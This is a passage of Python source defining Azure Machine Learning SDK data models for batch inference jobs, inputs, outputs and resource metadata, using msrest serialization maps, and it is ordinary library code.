    :ivar tags: A set of tags. Tag dictionary. Tags can be added, removed, and updated.
    :vartype tags: dict[str, str]
    """
    # Fields marked readonly are server-populated and never sent in a request payload.
    _validation = {
        'interaction_endpoints': {'readonly': True},
        'output': {'readonly': True},
        'provisioning_state': {'readonly': True},
        'status': {'readonly': True},
    }
    _attribute_map = {
        'compute': {'key': 'compute', 'type': 'ComputeConfiguration'},
        'dataset': {'key': 'dataset', 'type': 'InferenceDataInputBase'},
        'description': {'key': 'description', 'type': 'str'},
        'error_threshold': {'key': 'errorThreshold', 'type': 'int'},
        'input_data': {'key': 'inputData', 'type': '{JobInput}'},
        'interaction_endpoints': {'key': 'interactionEndpoints', 'type': '{JobEndpoint}'},
        'logging_level': {'key': 'loggingLevel', 'type': 'str'},
        'max_concurrency_per_instance': {'key': 'maxConcurrencyPerInstance', 'type': 'int'},
        'mini_batch_size': {'key': 'miniBatchSize', 'type': 'long'},
        'name': {'key': 'name', 'type': 'str'},
        'output': {'key': 'output', 'type': 'JobOutputArtifacts'},
        'output_data': {'key': 'outputData', 'type': '{JobOutputV2}'},
        'output_dataset': {'key': 'outputDataset', 'type': 'DataVersion'},
        'output_file_name': {'key': 'outputFileName', 'type': 'str'},
        'partition_keys': {'key': 'partitionKeys', 'type': '[str]'},
        'properties': {'key': 'properties', 'type': '{str}'},
        'provisioning_state': {'key': 'provisioningState', 'type': 'str'},
        'retry_settings': {'key': 'retrySettings', 'type': 'BatchRetrySettings'},
        'status': {'key': 'status', 'type': 'str'},
        'tags': {'key': 'tags', 'type': '{str}'},
    }
    def __init__(
        self,
        **kwargs
    ):
        """
        :keyword compute: Compute configuration used to set instance count.
        :paramtype compute: ~azure.mgmt.machinelearningservices.models.ComputeConfiguration
        :keyword dataset: Input dataset
         This will be deprecated. Use InputData instead.
        :paramtype dataset: ~azure.mgmt.machinelearningservices.models.InferenceDataInputBase
        :keyword description: The asset description text.
        :paramtype description: str
        :keyword error_threshold: Error threshold, if the error count for the entire input goes above
         this value,
         the batch inference will be aborted. Range is [-1, int.MaxValue]
         -1 value indicates, ignore all failures during batch inference.
        :paramtype error_threshold: int
        :keyword input_data: Input data for the job.
        :paramtype input_data: dict[str, ~azure.mgmt.machinelearningservices.models.JobInput]
        :keyword logging_level: Logging level for batch inference operation. Possible values include:
         "Info", "Warning", "Debug".
        :paramtype logging_level: str or ~azure.mgmt.machinelearningservices.models.BatchLoggingLevel
        :keyword max_concurrency_per_instance: Indicates maximum number of parallelism per instance.
        :paramtype max_concurrency_per_instance: int
        :keyword mini_batch_size: Size of the mini-batch passed to each batch invocation.
         For FileDataset, this is the number of files per mini-batch.
         For TabularDataset, this is the size of the records in bytes, per mini-batch.
        :paramtype mini_batch_size: long
        :keyword name:
        :paramtype name: str
        :keyword output_data: Job output data location
         Optional parameter: when not specified, the default location is
         workspaceblobstore location.
        :paramtype output_data: dict[str, ~azure.mgmt.machinelearningservices.models.JobOutputV2]
        :keyword output_dataset: Output dataset location
         Optional parameter: when not specified, the default location is
         workspaceblobstore location.
         This will be deprecated. Use OutputData instead.
        :paramtype output_dataset: ~azure.mgmt.machinelearningservices.models.DataVersion
        :keyword output_file_name: Output file name.
        :paramtype output_file_name: str
        :keyword partition_keys: Partition keys list used for Named partitioning.
        :paramtype partition_keys: list[str]
        :keyword properties: The asset property dictionary.
        :paramtype properties: dict[str, str]
        :keyword retry_settings: Retry Settings for the batch inference operation.
        :paramtype retry_settings: ~azure.mgmt.machinelearningservices.models.BatchRetrySettings
        :keyword tags: A set of tags. Tag dictionary. Tags can be added, removed, and updated.
        :paramtype tags: dict[str, str]
        """
        super(BatchJob, self).__init__(**kwargs)
        self.compute = kwargs.get('compute', None)
        self.dataset = kwargs.get('dataset', None)
        self.description = kwargs.get('description', None)
        self.error_threshold = kwargs.get('error_threshold', None)
        self.input_data = kwargs.get('input_data', None)
        # Server-populated (readonly); always initialized to None on the client.
        self.interaction_endpoints = None
        self.logging_level = kwargs.get('logging_level', None)
        self.max_concurrency_per_instance = kwargs.get('max_concurrency_per_instance', None)
        self.mini_batch_size = kwargs.get('mini_batch_size', None)
        self.name = kwargs.get('name', None)
        # Server-populated (readonly).
        self.output = None
        self.output_data = kwargs.get('output_data', None)
        self.output_dataset = kwargs.get('output_dataset', None)
        self.output_file_name = kwargs.get('output_file_name', None)
        self.partition_keys = kwargs.get('partition_keys', None)
        self.properties = kwargs.get('properties', None)
        # Server-populated (readonly).
        self.provisioning_state = None
        self.retry_settings = kwargs.get('retry_settings', None)
        # Server-populated (readonly).
        self.status = None
        self.tags = kwargs.get('tags', None)
class Resource(msrest.serialization.Model):
    """Common fields that are returned in the response for all Azure Resource Manager resources.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar id: Fully qualified resource ID for the resource. Ex -
     /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
    :vartype id: str
    :ivar name: The name of the resource.
    :vartype name: str
    :ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
     "Microsoft.Storage/storageAccounts".
    :vartype type: str
    """

    _validation = {
        "id": {"readonly": True},
        "name": {"readonly": True},
        "type": {"readonly": True},
    }

    _attribute_map = {
        "id": {"key": "id", "type": "str"},
        "name": {"key": "name", "type": "str"},
        "type": {"key": "type", "type": "str"},
    }

    def __init__(self, **kwargs):
        """ """
        super().__init__(**kwargs)
        # Every field on this model is server-populated; clients never set them.
        self.id = None
        self.name = None
        self.type = None
class BatchJobResource(Resource):
    """Azure Resource Manager resource envelope.

    Variables are only populated by the server, and will be ignored when sending a request.

    All required parameters must be populated in order to send to Azure.

    :ivar id: Fully qualified resource ID for the resource. Ex -
     /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
    :vartype id: str
    :ivar name: The name of the resource.
    :vartype name: str
    :ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
     "Microsoft.Storage/storageAccounts".
    :vartype type: str
    :ivar properties: Required. [Required] Additional attributes of the entity.
    :vartype properties: ~azure.mgmt.machinelearningservices.models.BatchJob
    :ivar system_data: System data associated with resource provider.
    :vartype system_data: ~azure.mgmt.machinelearningservices.models.SystemData
    """

    _validation = {
        "id": {"readonly": True},
        "name": {"readonly": True},
        "type": {"readonly": True},
        "properties": {"required": True},
        "system_data": {"readonly": True},
    }

    _attribute_map = {
        "id": {"key": "id", "type": "str"},
        "name": {"key": "name", "type": "str"},
        "type": {"key": "type", "type": "str"},
        "properties": {"key": "properties", "type": "BatchJob"},
        "system_data": {"key": "systemData", "type": "SystemData"},
    }

    def __init__(self, **kwargs):
        """
        :keyword properties: Required. [Required] Additional attributes of the entity.
        :paramtype properties: ~azure.mgmt.machinelearningservices.models.BatchJob
        """
        # Resource.__init__ initializes the server-populated id/name/type fields.
        super().__init__(**kwargs)
        # 'properties' is mandatory: a missing key raises KeyError.
        self.properties = kwargs["properties"]
        # Server-populated; never sent by the client.
        self.system_data = None
class BatchJobResourceArmPaginatedResult(msrest.serialization.Model):
    """A single page from a paginated list of BatchJob entities.

    :ivar next_link: The link to the next page of BatchJob objects. If null, there are no
     additional pages.
    :vartype next_link: str
    :ivar value: An array of objects of type BatchJob.
    :vartype value: list[~azure.mgmt.machinelearningservices.models.BatchJobResource]
    """

    _attribute_map = {
        "next_link": {"key": "nextLink", "type": "str"},
        "value": {"key": "value", "type": "[BatchJobResource]"},
    }

    def __init__(self, **kwargs):
        """
        :keyword next_link: The link to the next page of BatchJob objects. If null, there are no
         additional pages.
        :paramtype next_link: str
        :keyword value: An array of objects of type BatchJob.
        :paramtype value: list[~azure.mgmt.machinelearningservices.models.BatchJobResource]
        """
        super().__init__(**kwargs)
        self.next_link = kwargs.get("next_link")
        self.value = kwargs.get("value")
class BatchRetrySettings(msrest.serialization.Model):
    """Retry settings for a batch inference operation.

    :ivar max_retries: Maximum retry count for a mini-batch.
    :vartype max_retries: int
    :ivar timeout: Invocation timeout for a mini-batch, in ISO 8601 format.
    :vartype timeout: ~datetime.timedelta
    """

    _attribute_map = {
        "max_retries": {"key": "maxRetries", "type": "int"},
        "timeout": {"key": "timeout", "type": "duration"},
    }

    def __init__(self, **kwargs):
        """
        :keyword max_retries: Maximum retry count for a mini-batch.
        :paramtype max_retries: int
        :keyword timeout: Invocation timeout for a mini-batch, in ISO 8601 format.
        :paramtype timeout: ~datetime.timedelta
        """
        super().__init__(**kwargs)
        self.max_retries = kwargs.get("max_retries")
        self.timeout = kwargs.get("timeout")
class ComputeConfiguration(msrest.serialization.Model):
    """Configuration for compute binding.

    :ivar instance_count: Number of instances or nodes.
    :vartype instance_count: int
    :ivar instance_type: SKU type to run on.
    :vartype instance_type: str
    :ivar is_local: Set to true for jobs running on local compute.
    :vartype is_local: bool
    :ivar location: Location for virtual cluster run.
    :vartype location: str
    :ivar properties: Additional properties.
    :vartype properties: dict[str, str]
    :ivar target: ARM resource ID of the Compute you are targeting. If not provided the resource
     will be deployed as Managed.
    :vartype target: str
    """

    _attribute_map = {
        "instance_count": {"key": "instanceCount", "type": "int"},
        "instance_type": {"key": "instanceType", "type": "str"},
        "is_local": {"key": "isLocal", "type": "bool"},
        "location": {"key": "location", "type": "str"},
        "properties": {"key": "properties", "type": "{str}"},
        "target": {"key": "target", "type": "str"},
    }

    def __init__(self, **kwargs):
        """
        :keyword instance_count: Number of instances or nodes.
        :paramtype instance_count: int
        :keyword instance_type: SKU type to run on.
        :paramtype instance_type: str
        :keyword is_local: Set to true for jobs running on local compute.
        :paramtype is_local: bool
        :keyword location: Location for virtual cluster run.
        :paramtype location: str
        :keyword properties: Additional properties.
        :paramtype properties: dict[str, str]
        :keyword target: ARM resource ID of the Compute you are targeting. If not provided the
         resource will be deployed as Managed.
        :paramtype target: str
        """
        super().__init__(**kwargs)
        # Every field is optional; absent keys simply default to None.
        for attr in ("instance_count", "instance_type", "is_local",
                     "location", "properties", "target"):
            setattr(self, attr, kwargs.get(attr))
class DataVersion(msrest.serialization.Model):
    """Data asset version details.

    All required parameters must be populated in order to send to Azure.

    :ivar dataset_type: The Format of dataset. Possible values include: "Simple", "Dataflow".
    :vartype dataset_type: str or ~azure.mgmt.machinelearningservices.models.DatasetType
    :ivar datastore_id: ARM resource ID of the datastore where the asset is located.
    :vartype datastore_id: str
    :ivar description: The asset description text.
    :vartype description: str
    :ivar is_anonymous: If the name version are system generated (anonymous registration).
    :vartype is_anonymous: bool
    :ivar path: Required. [Required] The path of the file/directory in the datastore.
    :vartype path: str
    :ivar properties: The asset property dictionary.
    :vartype properties: dict[str, str]
    :ivar tags: A set of tags. Tag dictionary. Tags can be added, removed, and updated.
    :vartype tags: dict[str, str]
    """

    _validation = {
        "path": {"required": True, "pattern": r"[a-zA-Z0-9_]"},
    }

    _attribute_map = {
        "dataset_type": {"key": "datasetType", "type": "str"},
        "datastore_id": {"key": "datastoreId", "type": "str"},
        "description": {"key": "description", "type": "str"},
        "is_anonymous": {"key": "isAnonymous", "type": "bool"},
        "path": {"key": "path", "type": "str"},
        "properties": {"key": "properties", "type": "{str}"},
        "tags": {"key": "tags", "type": "{str}"},
    }

    def __init__(self, **kwargs):
        """
        :keyword dataset_type: The Format of dataset. Possible values include: "Simple", "Dataflow".
        :paramtype dataset_type: str or ~azure.mgmt.machinelearningservices.models.DatasetType
        :keyword datastore_id: ARM resource ID of the datastore where the asset is located.
        :paramtype datastore_id: str
        :keyword description: The asset description text.
        :paramtype description: str
        :keyword is_anonymous: If the name version are system generated (anonymous registration).
        :paramtype is_anonymous: bool
        :keyword path: Required. [Required] The path of the file/directory in the datastore.
        :paramtype path: str
        :keyword properties: The asset property dictionary.
        :paramtype properties: dict[str, str]
        :keyword tags: A set of tags. Tag dictionary. Tags can be added, removed, and updated.
        :paramtype tags: dict[str, str]
        """
        super().__init__(**kwargs)
        # 'path' is the only mandatory field: a missing key raises KeyError.
        self.path = kwargs["path"]
        self.dataset_type = kwargs.get("dataset_type")
        self.datastore_id = kwargs.get("datastore_id")
        self.description = kwargs.get("description")
        self.is_anonymous = kwargs.get("is_anonymous")
        self.properties = kwargs.get("properties")
        self.tags = kwargs.get("tags")
class ErrorDetail(msrest.serialization.Model):
    """Error detail information.

    All required parameters must be populated in order to send to Azure.

    :ivar code: Required. Error code.
    :vartype code: str
    :ivar message: Required. Error message.
    :vartype message: str
    """

    _validation = {
        "code": {"required": True},
        "message": {"required": True},
    }

    _attribute_map = {
        "code": {"key": "code", "type": "str"},
        "message": {"key": "message", "type": "str"},
    }

    def __init__(self, **kwargs):
        """
        :keyword code: Required. Error code.
        :paramtype code: str
        :keyword message: Required. Error message.
        :paramtype message: str
        """
        super().__init__(**kwargs)
        # Both fields are mandatory: missing keys raise KeyError.
        self.code = kwargs["code"]
        self.message = kwargs["message"]
class ErrorResponse(msrest.serialization.Model):
    """Error response information.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar code: Error code.
    :vartype code: str
    :ivar message: Error message.
    :vartype message: str
    :ivar details: An array of error detail objects.
    :vartype details: list[~azure.mgmt.machinelearningservices.models.ErrorDetail]
    """

    _validation = {
        "code": {"readonly": True},
        "message": {"readonly": True},
        "details": {"readonly": True},
    }

    _attribute_map = {
        "code": {"key": "code", "type": "str"},
        "message": {"key": "message", "type": "str"},
        "details": {"key": "details", "type": "[ErrorDetail]"},
    }

    def __init__(self, **kwargs):
        """ """
        super().__init__(**kwargs)
        # All fields are server-populated; clients never set them.
        self.code = None
        self.message = None
        self.details = None
class InferenceDataInputBase(msrest.serialization.Model):
    """Polymorphic base for inference data inputs.

    You probably want to use the sub-classes and not this class directly. Known
    sub-classes are: InferenceDataUrlInput, InferenceDatasetIdInput, InferenceDatasetInput.

    All required parameters must be populated in order to send to Azure.

    :ivar data_input_type: Required. Constant filled by server. Possible values include:
     "DatasetVersion", "DatasetId", "DataUrl".
    :vartype data_input_type: str or
     ~azure.mgmt.machinelearningservices.models.InferenceDataInputType
    """

    _validation = {
        "data_input_type": {"required": True},
    }

    _attribute_map = {
        "data_input_type": {"key": "dataInputType", "type": "str"},
    }

    # Discriminator mapping used by msrest to deserialize into the right subclass.
    _subtype_map = {
        "data_input_type": {
            "DataUrl": "InferenceDataUrlInput",
            "DatasetId": "InferenceDatasetIdInput",
            "DatasetVersion": "InferenceDatasetInput",
        }
    }

    def __init__(self, **kwargs):
        """ """
        super().__init__(**kwargs)
        # Subclasses overwrite this with their discriminator value.
        self.data_input_type = None  # type: Optional[str]
class InferenceDatasetIdInput(InferenceDataInputBase):
    """Inference data input referenced by dataset ARM ID.

    All required parameters must be populated in order to send to Azure.

    :ivar data_input_type: Required. Constant filled by server. Possible values include:
     "DatasetVersion", "DatasetId", "DataUrl".
    :vartype data_input_type: str or
     ~azure.mgmt.machinelearningservices.models.InferenceDataInputType
    :ivar dataset_id: ARM ID of the input dataset.
    :vartype dataset_id: str
    """

    _validation = {
        "data_input_type": {"required": True},
    }

    _attribute_map = {
        "data_input_type": {"key": "dataInputType", "type": "str"},
        "dataset_id": {"key": "datasetId", "type": "str"},
    }

    def __init__(self, **kwargs):
        """
        :keyword dataset_id: ARM ID of the input dataset.
        :paramtype dataset_id: str
        """
        super().__init__(**kwargs)
        # Fixed discriminator for this subtype.
        self.data_input_type = 'DatasetId'  # type: str
        self.dataset_id = kwargs.get("dataset_id")
class InferenceDatasetInput(InferenceDataInputBase):
    """Inference data input referenced by dataset name and version.

    All required parameters must be populated in order to send to Azure.

    :ivar data_input_type: Required. Constant filled by server. Possible values include:
     "DatasetVersion", "DatasetId", "DataUrl".
    :vartype data_input_type: str or
     ~azure.mgmt.machinelearningservices.models.InferenceDataInputType
    :ivar dataset_name: Name of the input dataset.
    :vartype dataset_name: str
    :ivar dataset_version: Version of the input dataset.
    :vartype dataset_version: str
    """

    _validation = {
        "data_input_type": {"required": True},
    }

    _attribute_map = {
        "data_input_type": {"key": "dataInputType", "type": "str"},
        "dataset_name": {"key": "datasetName", "type": "str"},
        "dataset_version": {"key": "datasetVersion", "type": "str"},
    }

    def __init__(self, **kwargs):
        """
        :keyword dataset_name: Name of the input dataset.
        :paramtype dataset_name: str
        :keyword dataset_version: Version of the input dataset.
        :paramtype dataset_version: str
        """
        super().__init__(**kwargs)
        # Fixed discriminator for this subtype.
        self.data_input_type = 'DatasetVersion'  # type: str
        self.dataset_name = kwargs.get("dataset_name")
        self.dataset_version = kwargs.get("dataset_version")
class InferenceDataUrlInput(InferenceDataInputBase):
    """Inference data input referenced by a direct URL (for example, a blob URL).

    All required parameters must be populated in order to send to Azure.

    :ivar data_input_type: Required. Constant filled by server. Possible values include:
     "DatasetVersion", "DatasetId", "DataUrl".
    :vartype data_input_type: str or
     ~azure.mgmt.machinelearningservices.models.InferenceDataInputType
    :ivar path: Required. Asset path to the input data, say a blob URL.
    :vartype path: str
    """

    _validation = {
        "data_input_type": {"required": True},
        "path": {"required": True, "pattern": r"[a-zA-Z0-9_]"},
    }

    _attribute_map = {
        "data_input_type": {"key": "dataInputType", "type": "str"},
        "path": {"key": "path", "type": "str"},
    }

    def __init__(self, **kwargs):
        """
        :keyword path: Required. Asset path to the input data, say a blob URL.
        :paramtype path: str
        """
        super().__init__(**kwargs)
        # Fixed discriminator for this subtype.
        self.data_input_type = 'DataUrl'  # type: str
        # 'path' is mandatory: a missing key raises KeyError.
        self.path = kwargs["path"]
class JobEndpoint(msrest.serialization.Model):
    """Job endpoint definition.

    :ivar endpoint: Url for endpoint.
    :vartype endpoint: str
    :ivar job_endpoint_type: Endpoint type.
    :vartype job_endpoint_type: str
    :ivar port: Port for endpoint.
    :vartype port: int
    :ivar properties: Additional properties to set on the endpoint.
    :vartype properties: dict[str, str]
    """

    _attribute_map = {
        "endpoint": {"key": "endpoint", "type": "str"},
        "job_endpoint_type": {"key": "jobEndpointType", "type": "str"},
        "port": {"key": "port", "type": "int"},
        "properties": {"key": "properties", "type": "{str}"},
    }

    def __init__(self, **kwargs):
        """
        :keyword endpoint: Url for endpoint.
        :paramtype endpoint: str
        :keyword job_endpoint_type: Endpoint type.
        :paramtype job_endpoint_type: str
        :keyword port: Port for endpoint.
        :paramtype port: int
        :keyword properties: Additional properties to set on the endpoint.
        :paramtype properties: dict[str, str]
        """
        super().__init__(**kwargs)
        # Every field is optional; absent keys simply default to None.
        for attr in ("endpoint", "job_endpoint_type", "port", "properties"):
            setattr(self, attr, kwargs.get(attr))
class JobInput(msrest.serialization.Model):
    """Polymorphic base for job input definitions.

    You probably want to use the sub-classes and not this class directly. Known
    sub-classes are: MLTableJobInput, UriFileJobInput, UriFolderJobInput.

    All required parameters must be populated in order to send to Azure.

    :ivar description: Description for the input.
    :vartype description: str
    :ivar job_input_type: Required. Specifies the type of job.Constant filled by server. Possible
     values include: "UriFile", "UriFolder", "MLTable".
    :vartype job_input_type: str or ~azure.mgmt.machinelearningservices.models.JobInputType
    """

    _validation = {
        "job_input_type": {"required": True},
    }

    _attribute_map = {
        "description": {"key": "description", "type": "str"},
        "job_input_type": {"key": "jobInputType", "type": "str"},
    }

    # Discriminator mapping used by msrest to deserialize into the right subclass.
    _subtype_map = {
        "job_input_type": {
            "MLTable": "MLTableJobInput",
            "UriFile": "UriFileJobInput",
            "UriFolder": "UriFolderJobInput",
        }
    }

    def __init__(self, **kwargs):
        """
        :keyword description: Description for the input.
        :paramtype description: str
        """
        super().__init__(**kwargs)
        self.description = kwargs.get("description")
        # Subclasses overwrite this with their discriminator value.
        self.job_input_type = None  # type: Optional[str]
class JobOutputArtifacts(msrest.serialization.Model):
    """Job output definition container information on where to find job logs and artifacts.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar datastore_id: ARM ID of the datastore where the job logs and artifacts are stored.
    :vartype datastore_id: str
    :ivar path: Path within the datastore to the job logs and artifacts.
    :vartype path: str
    """

    _validation = {
        "datastore_id": {"readonly": True},
        "path": {"readonly": True},
    }

    _attribute_map = {
        "datastore_id": {"key": "datastoreId", "type": "str"},
        "path": {"key": "path", "type": "str"},
    }

    def __init__(self, **kwargs):
        """ """
        super().__init__(**kwargs)
        # Both fields are server-populated; clients never set them.
        self.datastore_id = None
        self.path = None
class JobOutputV2(msrest.serialization.Model):
    """Polymorphic base describing where to find the job output.

    You probably want to use the sub-classes and not this class directly. Known
    sub-classes are: UriFileJobOutput.

    All required parameters must be populated in order to send to Azure.

    :ivar description: Description for the output.
    :vartype description: str
    :ivar job_output_type: Required. Specifies the type of job.Constant filled by server. Possible
     values include: "UriFile".
    :vartype job_output_type: str or ~azure.mgmt.machinelearningservices.models.JobOutputType
    """

    _validation = {
        "job_output_type": {"required": True},
    }

    _attribute_map = {
        "description": {"key": "description", "type": "str"},
        "job_output_type": {"key": "jobOutputType", "type": "str"},
    }

    # Discriminator mapping used by msrest to deserialize into the right subclass.
    _subtype_map = {
        "job_output_type": {"UriFile": "UriFileJobOutput"}
    }

    def __init__(self, **kwargs):
        """
        :keyword description: Description for the output.
        :paramtype description: str
        """
        super().__init__(**kwargs)
        self.description = kwargs.get("description")
        # Subclasses overwrite this with their discriminator value.
        self.job_output_type = None  # type: Optional[str]
class LabelClass(msrest.serialization.Model):
    """Label class definition.

    :ivar display_name: Display name of the label class.
    :vartype display_name: str
    :ivar subclasses: Dictionary of subclasses of the label class.
    :vartype subclasses: dict[str, ~azure.mgmt.machinelearningservices.models.LabelClass]
    """

    _attribute_map = {
        "display_name": {"key": "displayName", "type": "str"},
        # Recursive: each subclass value is itself a LabelClass.
        "subclasses": {"key": "subclasses", "type": "{LabelClass}"},
    }

    def __init__(self, **kwargs):
        """
        :keyword display_name: Display name of the label class.
        :paramtype display_name: str
        :keyword subclasses: Dictionary of subclasses of the label class.
        :paramtype subclasses: dict[str, ~azure.mgmt.machinelearningservices.models.LabelClass]
        """
        super().__init__(**kwargs)
        self.display_name = kwargs.get("display_name")
        self.subclasses = kwargs.get("subclasses")
class MLTableJobInput(JobInput, AssetJobInput):
    """Job input backed by an MLTable asset.

    All required parameters must be populated in order to send to Azure.

    :ivar mode: Input Asset Delivery Mode. Possible values include: "ReadOnlyMount",
     "ReadWriteMount", "Download", "Direct", "EvalMount", "EvalDownload".
    :vartype mode: str or ~azure.mgmt.machinelearningservices.models.InputDeliveryMode
    :ivar uri: Required. Input Asset URI.
    :vartype uri: str
    :ivar description: Description for the input.
    :vartype description: str
    :ivar job_input_type: Required. Specifies the type of job.Constant filled by server. Possible
     values include: "UriFile", "UriFolder", "MLTable".
    :vartype job_input_type: str or ~azure.mgmt.machinelearningservices.models.JobInputType
    """
    _validation = {
        'uri': {'required': True, 'pattern': r'[a-zA-Z0-9_]'},
        'job_input_type': {'required': True},
    }
    _attribute_map = {
        'mode': {'key': 'mode', 'type': 'str'},
        'uri': {'key': 'uri', 'type': 'str'},
        'description': {'key': 'description', 'type': 'str'},
        'job_input_type': {'key': 'jobInputType', 'type': 'str'},
    }
    def __init__(
        self,
        **kwargs
    ):
        """
        :keyword mode: Input Asset Delivery Mode. Possible values include: "ReadOnlyMount",
         "ReadWriteMount", "Download", "Direct", "EvalMount", "EvalDownload".
        :paramtype mode: str or ~azure.mgmt.machinelearningservices.models.InputDeliveryMode
        :keyword uri: Required. Input Asset URI.
        :paramtype uri: str
        :keyword description: Description for the input.
        :paramtype description: str
        """
        super(MLTableJobInput, self).__init__(**kwargs)
        # Fields from AssetJobInput; 'uri' is mandatory (missing key raises KeyError).
        self.mode = kwargs.get('mode', None)
        self.uri = kwargs['uri']
        # Fields from JobInput.
        self.description = kwargs.get('description', None)
        # Discriminator: set exactly once (the generated original assigned it twice).
        self.job_input_type = 'MLTable'  # type: str
class SystemData(msrest.serialization.Model):
    """Metadata pertaining to creation and last modification of the resource.

    :ivar created_by: The identity that created the resource.
    :vartype created_by: str
    :ivar created_by_type: The type of identity that created the resource. Possible values include:
     "User", "Application", "ManagedIdentity", "Key".
    :vartype created_by_type: str or ~azure.mgmt.machinelearningservices.models.CreatedByType
    :ivar created_at: The timestamp of resource creation (UTC).
    :vartype created_at: ~datetime.datetime
    :ivar last_modified_by: The identity that last modified the resource.
    :vartype last_modified_by: str
    :ivar last_modified_by_type: The type of identity that last modified the resource. Possible
     values include: "User", "Application", "ManagedIdentity", "Key".
    :vartype last_modified_by_type: str or ~azure.mgmt.machinelearningservices.models.CreatedByType
    :ivar last_modified_at: The timestamp of resource last modification (UTC).
    :vartype last_modified_at: ~datetime.datetime
    """

    _attribute_map = {
        "created_by": {"key": "createdBy", "type": "str"},
        "created_by_type": {"key": "createdByType", "type": "str"},
        "created_at": {"key": "createdAt", "type": "iso-8601"},
        "last_modified_by": {"key": "lastModifiedBy", "type": "str"},
        "last_modified_by_type": {"key": "lastModifiedByType", "type": "str"},
        "last_modified_at": {"key": "lastModifiedAt", "type": "iso-8601"},
    }

    def __init__(self, **kwargs):
        """
        :keyword created_by: The identity that created the resource.
        :paramtype created_by: str
        :keyword created_by_type: The type of identity that created the resource. Possible values
         include: "User", "Application", "ManagedIdentity", "Key".
        :paramtype created_by_type: str or ~azure.mgmt.machinelearningservices.models.CreatedByType
        :keyword created_at: The timestamp of resource creation (UTC).
        :paramtype created_at: ~datetime.datetime
        :keyword last_modified_by: The identity that last modified the resource.
        :paramtype last_modified_by: str
        :keyword last_modified_by_type: The type of identity that last modified the resource.
         Possible values include: "User", "Application", "ManagedIdentity", "Key".
        :paramtype last_modified_by_type: str or
         ~azure.mgmt.machinelearningservices.models.CreatedByType
        :keyword last_modified_at: The timestamp of resource last modification (UTC).
        :paramtype last_modified_at: ~datetime.datetime
        """
        super().__init__(**kwargs)
        # Every field is optional; absent keys simply default to None.
        for attr in ("created_by", "created_by_type", "created_at",
                     "last_modified_by", "last_modified_by_type", "last_modified_at"):
            setattr(self, attr, kwargs.get(attr))
class UriFileJobInput(JobInput, AssetJobInput):
    """UriFileJobInput.

    All required parameters must be populated in order to send to Azure.

    :ivar mode: Input Asset Delivery Mode. Possible values include: "ReadOnlyMount",
     "ReadWriteMount", "Download", "Direct", "EvalMount", "EvalDownload".
    :vartype mode: str or ~azure.mgmt.machinelearningservices.models.InputDeliveryMode
    :ivar uri: Required. Input Asset URI.
    :vartype uri: str
    :ivar description: Description for the input.
    :vartype description: str
    :ivar job_input_type: Required. Specifies the type of job. Constant filled by server. Possible
     values include: "UriFile", "UriFolder", "MLTable".
    :vartype job_input_type: str or ~azure.mgmt.machinelearningservices.models.JobInputType
    """

    _validation = {
        'uri': {'required': True, 'pattern': r'[a-zA-Z0-9_]'},
        'job_input_type': {'required': True},
    }

    _attribute_map = {
        'mode': {'key': 'mode', 'type': 'str'},
        'uri': {'key': 'uri', 'type': 'str'},
        'description': {'key': 'description', 'type': 'str'},
        'job_input_type': {'key': 'jobInputType', 'type': 'str'},
    }

    def __init__(
        self,
        **kwargs
    ):
        """
        :keyword mode: Input Asset Delivery Mode. Possible values include: "ReadOnlyMount",
         "ReadWriteMount", "Download", "Direct", "EvalMount", "EvalDownload".
        :paramtype mode: str or ~azure.mgmt.machinelearningservices.models.InputDeliveryMode
        :keyword uri: Required. Input Asset URI.
        :paramtype uri: str
        :keyword description: Description for the input.
        :paramtype description: str
        """
        super(UriFileJobInput, self).__init__(**kwargs)
        self.mode = kwargs.get('mode', None)
        # 'uri' is required; a missing key raises KeyError by design.
        self.uri = kwargs['uri']
        self.description = kwargs.get('description', None)
        # Fix: the generated code assigned the discriminator twice; set it once.
        self.job_input_type = 'UriFile'  # type: str
class UriFileJobOutput(JobOutputV2, AssetJobOutput):
    """UriFileJobOutput.

    All required parameters must be populated in order to send to Azure.

    :ivar mode: Output Asset Delivery Mode. Possible values include: "ReadWriteMount", "Upload".
    :vartype mode: str or ~azure.mgmt.machinelearningservices.models.OutputDeliveryMode
    :ivar uri: Output Asset URI. This will have a default value of
     "azureml/{jobId}/{outputFolder}/{outputFileName}" if omitted.
    :vartype uri: str
    :ivar description: Description for the output.
    :vartype description: str
    :ivar job_output_type: Required. Specifies the type of job. Constant filled by server. Possible
     values include: "UriFile".
    :vartype job_output_type: str or ~azure.mgmt.machinelearningservices.models.JobOutputType
    """

    _validation = {
        'job_output_type': {'required': True},
    }

    _attribute_map = {
        'mode': {'key': 'mode', 'type': 'str'},
        'uri': {'key': 'uri', 'type': 'str'},
        'description': {'key': 'description', 'type': 'str'},
        'job_output_type': {'key': 'jobOutputType', 'type': 'str'},
    }

    def __init__(
        self,
        **kwargs
    ):
        """
        :keyword mode: Output Asset Delivery Mode. Possible values include: "ReadWriteMount",
         "Upload".
        :paramtype mode: str or ~azure.mgmt.machinelearningservices.models.OutputDeliveryMode
        :keyword uri: Output Asset URI. This will have a default value of
         "azureml/{jobId}/{outputFolder}/{outputFileName}" if omitted.
        :paramtype uri: str
        :keyword description: Description for the output.
        :paramtype description: str
        """
        super(UriFileJobOutput, self).__init__(**kwargs)
        self.mode = kwargs.get('mode', None)
        self.uri = kwargs.get('uri', None)
        self.description = kwargs.get('description', None)
        # Fix: the generated code assigned the discriminator twice; set it once.
        self.job_output_type = 'UriFile'  # type: str
class UriFolderJobInput(JobInput, AssetJobInput):
    """UriFolderJobInput.

    All required parameters must be populated in order to send to Azure.

    :ivar mode: Input Asset Delivery Mode. Possible values include: "ReadOnlyMount",
     "ReadWriteMount", "Download", "Direct", "EvalMount", "EvalDownload".
    :vartype mode: str or ~azure.mgmt.machinelearningservices.models.InputDeliveryMode
    :ivar uri: Required. Input Asset URI.
    :vartype uri: str
    :ivar description: Description for the input.
    :vartype description: str
    :ivar job_input_type: Required. Specifies the type of job. Constant filled by server. Possible
     values include: "UriFile", "UriFolder", "MLTable".
    :vartype job_input_type: str or ~azure.mgmt.machinelearningservices.models.JobInputType
    """

